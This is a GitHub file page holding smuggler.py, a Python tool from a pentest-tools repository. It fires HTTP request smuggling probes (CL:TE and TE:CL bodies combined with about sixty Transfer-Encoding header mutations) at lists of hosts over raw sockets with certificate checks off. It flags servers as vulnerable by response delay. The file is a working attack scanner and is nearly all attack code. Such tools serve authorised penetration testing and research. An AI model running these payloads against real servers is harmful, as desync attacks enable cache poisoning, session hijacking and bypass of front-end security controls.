forked from gwen001/pentest-tools
-
Notifications
You must be signed in to change notification settings - Fork 0
/
smuggler.py
executable file
·825 lines (672 loc) · 24.2 KB
/
smuggler.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
#!/usr/bin/python3
# I don't believe in license.
# You can do whatever you want with this program.
# Based on the awesome James Kettle research
# https://twitter.com/albinowax
# https://portswigger.net/web-security/request-smuggling
# https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
import os
import sys
import ssl
import time
import random
import argparse
import socket
import requests
from urllib.parse import urlparse
from threading import Thread
from queue import Queue
from colored import fg, bg, attr
MAX_EXCEPTION = 10
MAX_VULNERABLE = 3
# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def banner():
print("""
_
___ _ __ ___ _ _ __ _ __ _| | ___ _ __ _ __ _ _
/ __| '_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__| | '_ \| | | |
\__ \ | | | | | |_| | (_| | (_| | | __/ | _ | |_) | |_| |
|___/_| |_| |_|\__,_|\__, |\__, |_|\___|_| (_) | .__/ \__, |
|___/ |___/ |_| |___/
by @gwendallecoguic
""")
pass
banner()
CRLF = '\r\n'
t_base_headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/60.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
# 'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close',
'Content-Length': '0',
}
t_colors = {
'ref': 'cyan',
'attack': 'white',
'vulnerable': 'light_red',
}
t_attacks_datas = [
{'name':'CL:TE1', 'Content-Length':5, 'body':'1\r\nZ\r\nQ\r\n\r\n'},
{'name':'CL:TE2', 'Content-Length':11, 'body':'1\r\nZ\r\nQ\r\n\r\n'},
{'name':'TE:CL1', 'Content-Length':5, 'body':'0\r\n\r\n'},
{'name':'TE:CL2', 'Content-Length':6, 'body':'0\r\n\r\nX'},
]
t_registered_method = [
# 'tabprefix1',
# 'vertprefix1',
'vanilla',
'dualchunk',
'badwrap',
'space1',
'badsetupLF',
'gareth1',
# niche techniques
# 'underjoin1',
'spacejoin1',
#'underscore2',
# 'space2',
'nameprefix1',
'valueprefix1',
'nospace1',
'commaCow',
'cowComma',
'contentEnc',
'linewrapped1',
'quoted',
'aposed',
'badsetupCR',
'vertwrap',
'tabwrap',
# new techniques for BHEU
# 'chunky',
# new techniques for AppSec
'lazygrep',
'multiCase',
'zdwrap',
'zdspam',
'revdualchunk',
'nested',
# 'bodysplit',
# 'zdsuffix',
# 'tabsuffix',
# 'UPPERCASE',
# 'reversevanilla',
# 'spaceFF',
# 'accentTE',
# 'accentCH',
# 'unispace',
# 'connection',
'spacefix1_0',
'spacefix1_9',
'spacefix1_11',
'spacefix1_12',
'spacefix1_13',
'spacefix1_127',
'spacefix1_160',
'spacefix1_255',
'prefix1_0',
'prefix1_9',
'prefix1_11',
'prefix1_12',
'prefix1_13',
'prefix1_127',
'prefix1_160',
'prefix1_255',
'suffix1_0',
'suffix1_9',
'suffix1_11',
'suffix1_12',
'suffix1_13',
'suffix1_127',
'suffix1_160',
'suffix1_255',
]
# t_registered_method = [
# 'contentEnc',
# ]
class attackMethod:
def update_content_length( self, msg, cl ):
return msg.replace( 'Content-Length: 0', 'Content-Length: '+str(cl) )
def underjoin1( self, msg ):
msg = msg.replace( 'Transfer-Encoding', 'Transfer_Encoding' )
return msg
def underscore2( self, msg ):
msg = msg.replace( 'Content-Length', 'Content_Length' )
return msg
def spacejoin1( self, msg ):
msg = msg.replace( 'Transfer-Encoding', 'Transfer Encoding' )
return msg
def space1( self, msg ):
msg = msg.replace( 'Transfer-Encoding', 'Transfer-Encoding ' )
return msg
def space2( self, msg ):
msg = msg.replace( 'Content-Length', 'Content-Length ' )
return msg
def nameprefix1( self, msg ):
msg = msg.replace( 'Transfer-Encoding', ' Transfer-Encoding' )
return msg
def valueprefix1( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: ' )
return msg
def nospace1( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:' )
return msg
def tabprefix1( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:\t' )
return msg
def vertprefix1( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:\u000B' )
return msg
def commaCow( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked, identity' )
return msg
def cowComma( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: identity, ' )
return msg
def contentEnc( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Content-Encoding: ' )
return msg
def linewrapped1( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:\n' )
return msg
def gareth1( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding\n : ' )
return msg
def quoted( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: "chunked"' )
return msg
def aposed( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', "Transfer-Encoding: 'chunked'" )
return msg
def badwrap( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Foo: bar' )
msg = msg.replace( 'HTTP/1.1\r\n', 'HTTP/1.1\r\n Transfer-Encoding: chunked\r\n' )
return msg
def badsetupCR( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Foo: bar' )
msg = msg.replace( 'HTTP/1.1\r\n', 'HTTP/1.1\r\nFooz: bar\rTransfer-Encoding: chunked\r\n' )
return msg
def badsetupLF( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Foo: bar' )
msg = msg.replace( 'HTTP/1.1\r\n', 'HTTP/1.1\r\nFooz: bar\nTransfer-Encoding: chunked\r\n' )
return msg
def vertwrap( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: \n\u000B' )
return msg
def tabwrap( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: \n\t' )
return msg
def dualchunk( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked\r\nTransfer-Encoding: identity' )
return msg
def lazygrep( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunk' )
return msg
def multiCase( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'TrAnSFer-EnCODinG: cHuNkeD' )
return msg
def UPPERCASE( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'TRANSFER-ENCODING: CHUNKED' )
return msg
def zdwrap( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Foo: bar' )
msg = msg.replace( 'HTTP/1.1\r\n', 'HTTP/1.1\r\nFoo: bar\r\n\rTransfer-Encoding: chunked\r\n' )
return msg
def zdsuffix( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked\r' )
return msg
def zdsuffix( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked\t' )
return msg
def revdualchunk( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: identity\r\nTransfer-Encoding: chunked' )
return msg
def zdspam( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer\r-Encoding: chunked' )
return msg
def bodysplit( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Foo: barn\n\nTransfer-Encoding: chunked' )
return msg
def connection( self, msg ):
msg = msg.replace( 'Connection', 'Transfer-Encoding' )
return msg
def nested( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: cow chunked bar' )
return msg
def spaceFF( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:'+chr(255) )
return msg
def unispace( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:'+chr(160) )
return msg
def accentTE( self, msg ):
msg = msg.replace( 'Transfer-Encoding:', 'Transf'+chr(130)+'r-Encoding:' )
return msg
def accentCH( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfr-Encoding: ch'+chr(150)+'nked' )
return msg
# concept by @webtonull
def chunky( self, msg ):
pad_str = ''
pad_chunk = "F\r\nAAAAAAAAAAAAAAA\r\n"
for i in range(0,3000):
pad_str = pad_str + pad_chunk
msg = msg.replace( 'Transfer-Encoding: chunked\r\n\r\n', 'Transfer-Encoding: chunked\r\n\r\n'+pad_str )
if 'Content-Length: 11' in msg:
msg = msg.replace( 'Content-Length: ', 'Content-Length: 600' )
else:
msg = msg.replace( 'Content-Length: ', 'Content-Length: 6000' )
return msg
def vanilla( self, msg ):
# ???
return msg
def reversevanilla( self, msg ):
# ???
return msg
def spacefix1_0( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:'+chr(0) )
return msg
def spacefix1_9( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:'+chr(9) )
return msg
def spacefix1_11( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:'+chr(11) )
return msg
def spacefix1_12( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:'+chr(12) )
return msg
def spacefix1_13( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:'+chr(13) )
return msg
def spacefix1_127( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:'+chr(127) )
return msg
def spacefix1_160( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:'+chr(160) )
return msg
def spacefix1_255( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding:'+chr(255) )
return msg
def prefix1_0( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: '+chr(0) )
return msg
def prefix1_9( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: '+chr(9) )
return msg
def prefix1_11( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: '+chr(11) )
return msg
def prefix1_12( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: '+chr(12) )
return msg
def prefix1_13( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: '+chr(13) )
return msg
def prefix1_127( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: '+chr(127) )
return msg
def prefix1_160( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: '+chr(160) )
return msg
def prefix1_255( self, msg ):
msg = msg.replace( 'Transfer-Encoding: ', 'Transfer-Encoding: '+chr(255) )
return msg
def suffix1_0( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked'+chr(0) )
return msg
def suffix1_9( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked'+chr(9) )
return msg
def suffix1_11( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked'+chr(11) )
return msg
def suffix1_12( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked'+chr(12) )
return msg
def suffix1_13( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked'+chr(13) )
return msg
def suffix1_127( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked'+chr(127) )
return msg
def suffix1_160( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked'+chr(160) )
return msg
def suffix1_255( self, msg ):
msg = msg.replace( 'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked'+chr(255) )
return msg
class sockRequest:
url = ''
message = ''
response = ''
length = 0
time = 0
headers = ''
headers_length = 0
t_headers = {}
status_code = -1
status_reason = ''
content = ''
content_length = 0
def __init__( self, url, message ):
self.url = url
self.message = message
def receive_all( self, sock ):
datas = ''
for i in range(100):
chunk = sock.recv( 4096 )
if chunk:
datas = datas + chunk.decode(errors='ignore')
break # yes yes I know...
# but we don't really care about the content, it's mostly about the delay so...
else:
break
return datas
def extractDatas( self ):
try:
self.length = len( self.response )
p = self.response.find( CRLF+CRLF )
self.headers = self.response[0:p]
self.headers_length = len( self.headers )
self.content = self.response[p+len(CRLF+CRLF):]
self.content_length = len( self.content )
tmp = self.headers.split( CRLF )
first_line = tmp[0].split( ' ' )
self.status_code = int(first_line[1])
self.status_reason = first_line[2]
for header in tmp:
p = header.find( ': ' )
k = header[0:p]
v = header[p+2:]
self.t_headers[ k ] = v
except Exception as e:
sys.stdout.write( "%s[-] extractDatas - error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
def send( self ):
t_urlparse = urlparse( self.url )
if t_urlparse.port:
port = t_urlparse.port
elif t_urlparse.scheme == 'https':
port = 443
else:
port = 80
# not supposed to happen but thanks to AlessandroZ
# https://github.com/gwen001/pentest-tools/pull/3
if ':' in t_urlparse.netloc:
tmp = t_urlparse.netloc.split(':')
netloc = tmp[0]
port = tmp[1]
else:
netloc = t_urlparse.netloc
# print( t_urlparse )
# print( self.url )
# print( port )
# print( '>>>'+self.message+'<<<' )
sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
if t_urlparse.scheme == 'https':
context = ssl.SSLContext( ssl.PROTOCOL_SSLv23 )
context.verify_mode = ssl.CERT_NONE
sock = context.wrap_socket( sock, server_hostname=netloc )
sock.settimeout( _timeout )
try:
sock.connect( (netloc, int(port)) )
except Exception as e:
sys.stdout.write( "%s[-] send (connect) - error occurred: %s (%s)%s\n" % (fg('red'),e,self.url,attr(0)) )
return False
sock.sendall( str.encode(self.message) )
start = time.time()
try:
datas = self.receive_all( sock )
except Exception as e:
sys.stdout.write( "%s[-] send (receive) - error occurred: %s (%s)%s\n" % (fg('red'),e,self.url,attr(0)) )
return False
end = time.time()
try:
sock.shutdown( socket.SHUT_RDWR )
except Exception as e:
sys.stdout.write( "%s[-] send (shutdown) - error occurred: %s (%s)%s\n" % (fg('red'),e,self.url,attr(0)) )
return False
sock.close()
self.response = datas
self.time = (end - start) * 1000
if len(datas):
self.extractDatas()
def generateAttackMessage( base_message, method, attack_datas ):
try:
f = getattr( am, method )
except Exception as e:
return ''
msg = base_message.strip() + CRLF
msg = am.update_content_length( msg, attack_datas['Content-Length'] )
msg = msg + 'Transfer-Encoding: chunked' + CRLF
msg = msg + CRLF + attack_datas['body']
# apply methods variation
msg = f( msg )
return msg
def generateBaseMessage( url, t_evil_headers ):
t_urlparse = urlparse( url )
# print( t_urlparse )
if t_urlparse.path:
query = t_urlparse.path
else:
query = '/'
if t_urlparse.query:
query = query + '?' + t_urlparse.query
if t_urlparse.fragment:
query = query + '#' + t_urlparse.fragment
msg = 'POST ' + query + ' HTTP/1.1' + CRLF
msg = msg + 'Host: ' + t_urlparse.netloc + CRLF
for k,v in t_evil_headers.items():
msg = msg + k + ': ' + v + CRLF
msg = msg + CRLF
return msg
def testURL( url ):
time.sleep( 0.01 )
if _verbose <= 1:
sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
t_multiproc['n_current'] = t_multiproc['n_current'] + 1
# sys.stdout.write( '\n' )
if not url in t_exceptions:
t_exceptions[url] = 0
if not url in t_vulnerable:
t_vulnerable[url] = 0
if url in t_history:
return False
t_history.append( url )
base_message = generateBaseMessage( url, t_base_headers )
# reference request (we don't care)
r = doRequest( url, base_message )
if r.status_code < 0:
t_exceptions[url] = t_exceptions[url] + 1
else:
printResult( r, 'ref', '', '' )
for method in t_methods:
for attack_datas in t_attacks_datas:
if t_exceptions[url] >= MAX_EXCEPTION:
if _verbose >= 2:
print("skip too many exceptions %s" % url)
return False
if t_vulnerable[url] >= MAX_VULNERABLE:
if _verbose >= 2:
print("skip already vulnerable %s" % url)
return False
msg = generateAttackMessage( base_message, method, attack_datas )
# print( msg )
if not msg:
sys.stdout.write( '%smethod not implemented yet: %s%s\n' % (fg('red'),method,attr(0)) )
break
r = doRequest( url, msg )
if r.status_code < 0:
t_exceptions[url] = t_exceptions[url] + 1
else:
if r.time > 5000:
# if r.status_code == 500 and r.time > 5000:
color = 'vulnerable'
t_vulnerable[url] = t_vulnerable[url] + 1
else:
color = 'attack'
printResult( r, color, method, attack_datas )
def doRequest( url, message ):
r = sockRequest( url, message )
r.send()
return r
def printResult( r, r_type, method, attack_datas ):
if 'Content-Type' in r.t_headers:
content_type = r.t_headers['Content-Type']
else:
content_type = '-'
payload = method
if attack_datas:
payload = attack_datas['name'] + '|' + payload
if r_type == 'vulnerable':
vuln = 'VULNERABLE'
else:
vuln = '-'
output = '%s\t\tM=%s\t\tC=%d\t\tL=%d\t\ttime=%d\t\tT=%s\t\tV=%s\n' % (r.url.ljust(u_max_length),payload,r.status_code,r.length,r.time,content_type,vuln)
if _verbose >= 2 or ( _verbose>=1 and r_type=='vulnerable' ):
sys.stdout.write( '%s%s%s' % (fg(t_colors[r_type]),output,attr(0)) )
fp = open( t_multiproc['f_output'], 'a+' )
if r_type=='vulnerable':
output = output + '>>>'+r.message+'<<<\n'
fp.write( output )
fp.close()
if _verbose >= 3 or (_verbose >= 2 and r_type=='vulnerable'):
sys.stdout.write( '%s>>>%s<<<%s\n' % (fg('dark_gray'),r.message,attr(0)) )
if _verbose >= 4:
sys.stdout.write( '%s>>>%s<<<%s\n' % (fg('dark_gray'),r.response,attr(0)) )
parser = argparse.ArgumentParser()
parser.add_argument( "-a","--path",help="set paths list" )
parser.add_argument( "-d","--header",help="custom headers", action="append" )
parser.add_argument( "-i","--timeout",help="set timeout, default 10" )
parser.add_argument( "-m","--method",help="set methods separated by comma, default: all" )
parser.add_argument( "-o","--hosts",help="set host list (required or -u)" )
parser.add_argument( "-s","--scheme",help="scheme to use, default: http,https" )
parser.add_argument( "-t","--threads",help="threads, default 10" )
parser.add_argument( "-u","--urls",help="set url list (required or -o)" )
parser.add_argument( "-v","--verbose",help="display output, 0=nothing, 1=only vulnerable, 2=all requests, 3=requests+headers, 4=full debug, default: 1" )
parser.parse_args()
args = parser.parse_args()
if args.scheme:
t_scheme = args.scheme.split(',')
else:
t_scheme = ['http','https']
if args.timeout:
_timeout = int(args.timeout)
else:
_timeout = 30
if args.method:
t_methods = args.method.split(',')
else:
t_methods = t_registered_method
t_custom_headers = {}
if args.header:
for header in args.header:
if ':' in header:
tmp = header.split(':')
t_custom_headers[ tmp[0].strip() ] = ':'.join(tmp[1:]).strip()
t_base_headers.update( t_custom_headers )
# print(t_base_headers)
# exit()
t_hosts = []
if args.hosts:
if os.path.isfile(args.hosts):
fp = open( args.hosts, 'r' )
t_hosts = fp.read().strip().split("\n")
fp.close()
else:
t_hosts.append( args.hosts )
n_hosts = len(t_hosts)
sys.stdout.write( '%s[+] %d hosts found: %s%s\n' % (fg('green'),n_hosts,args.hosts,attr(0)) )
t_urls = []
if args.urls:
if os.path.isfile(args.urls):
fp = open( args.urls, 'r' )
t_urls = fp.read().strip().split("\n")
fp.close()
else:
t_urls.append( args.urls )
n_urls = len(t_urls)
sys.stdout.write( '%s[+] %d urls found: %s%s\n' % (fg('green'),n_urls,args.urls,attr(0)) )
if n_hosts == 0 and n_urls == 0:
parser.error( 'hosts/urls list missing' )
t_path = [ '' ]
if args.path:
if os.path.isfile(args.path):
fp = open( args.path, 'r' )
t_path = fp.read().strip().split("\n")
fp.close()
else:
t_path.append( args.path )
n_path = len(t_path)
sys.stdout.write( '%s[+] %d path found: %s%s\n' % (fg('green'),n_path,args.path,attr(0)) )
if args.verbose:
_verbose = int(args.verbose)
else:
_verbose = 1
if args.threads:
_threads = int(args.threads)
else:
_threads = 10
t_totest = []
t_totest2 = []
t_history = []
u_max_length = 0
d_output = os.getcwd()+'/smuggler'
f_output = d_output + '/' + 'output'
if not os.path.isdir(d_output):
try:
os.makedirs( d_output )
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
exit()
sys.stdout.write( '%s[+] options are -> threads:%d, verbose:%d%s\n' % (fg('green'),_threads,_verbose,attr(0)) )
for scheme in t_scheme:
for host in t_hosts:
for path in t_path:
u = scheme + '://' + host.strip() + path
t_totest.append( u )
l = len(u)
if l > u_max_length:
u_max_length = l
for url in t_urls:
for path in t_path:
u = url.strip() + path
t_totest.append( u )
l = len(u)
if l > u_max_length:
u_max_length = l
am = attackMethod()
n_totest = len(t_totest)
sys.stdout.write( '%s[+] %d urls to test.%s\n' % (fg('green'),n_totest,attr(0)) )
sys.stdout.write( '[+] testing...\n' )
random.shuffle(t_totest)
# print("\n".join(t_totest))
# exit()
t_exceptions = {}
t_vulnerable = {}
t_multiproc = {
'n_current': 0,
'n_total': n_totest,
'd_output': d_output,
'f_output': f_output,
'_verbose': _verbose,
}
def doWork():
while True:
url = q.get()
testURL( url )
q.task_done()
q = Queue( _threads*2 )
for i in range(_threads):
t = Thread( target=doWork )
t.daemon = True
t.start()
try:
for url in t_totest:
q.put( url )
q.join()
except KeyboardInterrupt:
sys.exit(1)